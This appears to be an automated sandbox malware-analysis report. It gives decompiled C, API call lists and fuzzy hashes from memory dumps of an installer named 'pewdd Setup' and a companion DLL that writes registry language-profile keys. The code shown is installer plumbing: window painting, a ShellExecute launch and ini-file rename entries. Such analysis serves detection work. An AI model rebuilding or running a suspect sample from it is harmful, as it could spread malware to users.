                                                0x00406b09
                                                0x00406b12
                                                0x00406b1b
                                                0x00000000
                                                0x00406b1b
                                                0x00406b28
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b32
                                                0x00406b35
                                                0x00000000
                                                0x00406958
                                                0x004068d8
                                                0x004068da
                                                0x004068da
                                                0x004068de
                                                0x004068e1
                                                0x004068e2
                                                0x004068e2
                                                0x00000000
                                                0x004068da
                                                0x0040684e
                                                0x00406854
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                                • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                				char* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t52;
                                                				intOrPtr _t71;
                                                				intOrPtr _t85;
                                                				long _t86;
                                                				int _t98;
                                                				struct HWND__* _t99;
                                                				signed int _t100;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				int _t110;
                                                				signed int* _t112;
                                                				signed int _t113;
                                                				char* _t114;
                                                				CHAR* _t115;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L11:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x429fb8 =  *0x429fb8 + 1;
                                                							}
                                                							L25:
                                                							_t110 = _a16;
                                                							L26:
                                                							return E00403D44(_a8, _a12, _t110);
                                                						}
                                                						_t52 = GetDlgItem(_a4, 0x3e8);
                                                						_t110 = _a16;
                                                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                							_v12 = _t100;
                                                							_v16 = _t109;
                                                							_v8 = 0x42db00;
                                                							if(_t100 - _t109 < 0x800) {
                                                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorA(0, 0x7f02));
                                                								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                								SetCursor(LoadCursorA(0, 0x7f00));
                                                								_t110 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                							goto L26;
                                                						} else {
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                								SendMessageA( *0x42eb68, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                								SendMessageA( *0x42eb68, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                                                						goto L25;
                                                					} else {
                                                						_t112 =  *0x4297a8 + 0x14;
                                                						if(( *_t112 & 0x00000020) == 0) {
                                                							goto L25;
                                                						}
                                                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004040B0();
                                                						goto L11;
                                                					}
                                                				}
                                                				_t98 = _a16;
                                                				_t113 =  *(_t98 + 0x30);
                                                				if(_t113 < 0) {
                                                					_t107 =  *0x42e33c; // 0x5770b8
                                                					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                				}
                                                				_t71 =  *0x42eb98; // 0x575ac0
                                                				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                				_t114 = _t113 + _t71;
                                                				_push(0x22);
                                                				_a16 =  *_t114;
                                                				_v12 = _v12 & 0x00000000;
                                                				_t115 = _t114 + 1;
                                                				_v16 = _t115;
                                                				_v8 = E00403DF1;
                                                				E00403CDD(_a4);
                                                				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                				_push(0x23);
                                                				E00403CDD(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                				_t99 = GetDlgItem(_a4, 0x3e8);
                                                				E00403D12(_t99);
                                                				SendMessageA(_t99, 0x45b, 1, 0);
                                                				_t85 =  *0x42eb70; // 0x571350
                                                				_t86 =  *(_t85 + 0x68);
                                                				if(_t86 < 0) {
                                                					_t86 = GetSysColor( ~_t86);
                                                				}
                                                				SendMessageA(_t99, 0x443, 0, _t86);
                                                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                				 *0x428f9c =  *0x428f9c & 0x00000000;
                                                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                                                				return 0;
                                                			}





















                                                APIs
                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403EB0
                                                • GetDlgItem.USER32 ref: 00403EC4
                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                                                • GetSysColor.USER32(?), ref: 00403EF3
                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                                                • lstrlenA.KERNEL32(?), ref: 00403F1B
                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                                                • GetDlgItem.USER32 ref: 00403F9B
                                                • SendMessageA.USER32(00000000), ref: 00403F9E
                                                • GetDlgItem.USER32 ref: 00403FC9
                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                                                • LoadCursorA.USER32 ref: 00404018
                                                • SetCursor.USER32(00000000), ref: 00404021
                                                • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                                                • LoadCursorA.USER32 ref: 00404041
                                                • SetCursor.USER32(00000000), ref: 00404044
                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$tduolivt
                                                • API String ID: 3615053054-394239126
                                                • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                                • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 10001919
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
                                                • RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,00000000,?), ref: 100019C0
                                                • RegSetValueExW.ADVAPI32(?,IconFile,00000000,00000001,?,?), ref: 100019DD
                                                • RegSetValueExW.ADVAPI32(?,IconIndex,00000000,00000004,?,00000004), ref: 100019F6
                                                • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 10001A15
                                                • RegCloseKey.ADVAPI32(?), ref: 10001A1F
                                                • RegCloseKey.ADVAPI32(?), ref: 10001A3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Value$CloseFromString$CreateOpen
                                                • String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
                                                • API String ID: 4095516225-583810935
                                                • Opcode ID: 74dbcd666c5b30bc7e3fd2568325e78fb605b2b14de09ad0e83335512eb64111
                                                • Instruction ID: df736f59abcd0097081eade9b0dd8497336b80a84934a6527bad77976acb3689
                                                • Opcode Fuzzy Hash: 74dbcd666c5b30bc7e3fd2568325e78fb605b2b14de09ad0e83335512eb64111
                                                • Instruction Fuzzy Hash: 76511CB6900208BBEB14DF94DC85FEE73B9EB48745F004508FB09AA185E774EA84CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				intOrPtr _t115;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x42eb70; // 0x571350
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextA(_t128, "pewdd Setup", 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					_t115 =  *0x42eb68; // 0x203c2
                                                					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                				}
                                                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                			}

                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,pewdd Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$pewdd Setup
                                                • API String ID: 941294808-1510970880
                                                • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                                • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10001B8D
                                                • RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
                                                • RegCloseKey.ADVAPI32(?), ref: 10001BD0
                                                • CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
                                                • RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
                                                • CLSIDFromString.OLE32(?,00000000), ref: 10001C17
                                                • RegCloseKey.ADVAPI32(?), ref: 10001C21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FromString$CloseQueryValue$Open
                                                • String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
                                                • API String ID: 1689171533-1912333115
                                                • Opcode ID: 1e6cca76155f9149102e55a1c3e60803270ed00ebddff0eedec561a0f6327374
                                                • Instruction ID: bcee0c928c0a748f03146c75f29357b32c7971ef7057f5d7be78e4c222c9fb76
                                                • Opcode Fuzzy Hash: 1e6cca76155f9149102e55a1c3e60803270ed00ebddff0eedec561a0f6327374
                                                • Instruction Fuzzy Hash: 01414EB6900218FBEB10DF94DC89FEE73F9EB48341F108519F6059A145E779EA84CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00405679() {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t15;
                                                				long _t16;
                                                				intOrPtr _t18;
                                                				int _t20;
                                                				void* _t28;
                                                				long _t29;
                                                				intOrPtr* _t37;
                                                				int _t43;
                                                				void* _t44;
                                                				long _t47;
                                                				CHAR* _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				intOrPtr* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t15 = E00405C49(1);
                                                				_t49 =  *(_t55 + 0x18);
                                                				if(_t15 != 0) {
                                                					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                					if(_t20 != 0) {
                                                						L16:
                                                						 *0x42ebf0 =  *0x42ebf0 + 1;
                                                						return _t20;
                                                					}
                                                				}
                                                				 *0x42c168 = 0x4c554e;
                                                				if(_t49 == 0) {
                                                					L5:
                                                					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                                                						_t18 =  *0x42eb70; // 0x571350
                                                						_t56 = _t55 + 0x10;
                                                						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                                                						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                                                						_t53 = _t20;
                                                						 *(_t56 + 0x14) = _t53;
                                                						if(_t53 == 0xffffffff) {
                                                							goto L16;
                                                						}
                                                						_t47 = GetFileSize(_t53, 0);
                                                						_t7 = _t43 + 0xa; // 0xa
                                                						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                							L15:
                                                							_t20 = CloseHandle(_t53);
                                                							goto L16;
                                                						} else {
                                                							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                                                								_t28 = E00405577(_t26 + 0xa, 0x409328);
                                                								if(_t28 == 0) {
                                                									L13:
                                                									_t29 = _t47;
                                                									L14:
                                                									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                                                									SetFilePointer(_t53, 0, 0, 0);
                                                									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                									GlobalFree(_t51);
                                                									goto L15;
                                                								}
                                                								_t37 = _t28 + 1;
                                                								_t44 = _t51 + _t47;
                                                								_t54 = _t37;
                                                								if(_t37 >= _t44) {
                                                									L21:
                                                									_t53 =  *(_t56 + 0x14);
                                                									_t29 = _t37 - _t51;
                                                									goto L14;
                                                								} else {
                                                									goto L20;
                                                								}
                                                								do {
                                                									L20:
                                                									 *((char*)(_t43 + _t54)) =  *_t54;
                                                									_t54 = _t54 + 1;
                                                								} while (_t54 < _t44);
                                                								goto L21;
                                                							}
                                                							E0040592B(_t51 + _t47, "[Rename]\r\n");
                                                							_t47 = _t47 + 0xa;
                                                							goto L13;
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E00405602(_t49, 0, 1));
                                                					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                                                					if(_t16 != 0 && _t16 <= 0x400) {
                                                						goto L5;
                                                					}
                                                				}
                                                				return _t16;
                                                			}

                                                APIs
                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                                • GetShortPathNameA.KERNEL32(?,0042C168,00000400), ref: 004056CF
                                                • GetShortPathNameA.KERNEL32(00000000,0042BBE0,00000400), ref: 004056EC
                                                • wsprintfA.USER32 ref: 0040570A
                                                • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                                • GlobalFree.KERNEL32 ref: 004057C9
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                  • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                • String ID: %s=%s$[Rename]
                                                • API String ID: 3772915668-1727408572
                                                • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                                • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
                                                • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
                                                • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
                                                • RegSetValueExW.ADVAPI32(?,Default,00000000,00000001,?,0000004E), ref: 10001DA3
                                                • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
                                                • RegSetValueExW.ADVAPI32(?,Profile,00000000,00000001,?,0000004E), ref: 10001DCC
                                                • RegCloseKey.ADVAPI32(?), ref: 10001DD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FromString$Value$CloseCreate
                                                • String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
                                                • API String ID: 1318437696-2502594939
                                                • Opcode ID: 219de78004404901e4a10b7b8619c7330ff3e8dfab8829f2693213f9e8709c68
                                                • Instruction ID: a810eb17c9981278689f5bd632f674f6ba586ade2fedf0eeaa1e4b7a91f9f386
                                                • Opcode Fuzzy Hash: 219de78004404901e4a10b7b8619c7330ff3e8dfab8829f2693213f9e8709c68
                                                • Instruction Fuzzy Hash: 1C5139B6A40208BBEB14CFA4DC85FEE73B8FB48740F108559F605AB185E775EA44CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002344
                                                • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
                                                • RegCloseKey.ADVAPI32(?), ref: 1000237C
                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 1000239F
                                                • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
                                                • RegCloseKey.ADVAPI32(?), ref: 100023D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseFromOpenQueryStringValue
                                                • String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
                                                • API String ID: 193680167-3603924166
                                                • Opcode ID: 2239cf649ecf91bfd5d5ccbe60dbfeb49e0bf0c82995ac3b6170ae3169d63a42
                                                • Instruction ID: 9019a6df0a4fdffc2af0502b6396b916a850ccad7944babd2507cba8de38034d
                                                • Opcode Fuzzy Hash: 2239cf649ecf91bfd5d5ccbe60dbfeb49e0bf0c82995ac3b6170ae3169d63a42
                                                • Instruction Fuzzy Hash: 6B4119B6900219FFEB10DF94CD89FEE77B8EB48341F108558F605A6185E774AB84CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 100024C4
                                                • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 100024E6
                                                • RegCloseKey.ADVAPI32(?), ref: 100024F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FromString$CloseOpenValue
                                                • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                                • API String ID: 3688305288-1256949467
                                                • Opcode ID: a4dec781b523efaba972fbc07692906d8e0cb1e002f3ad771dceab59233fcf46
                                                • Instruction ID: 908e5e9e7281ecf6603aa7e3d9dc0c2648cffd92a0e0ff892a4c1443a0d5240a
                                                • Opcode Fuzzy Hash: a4dec781b523efaba972fbc07692906d8e0cb1e002f3ad771dceab59233fcf46
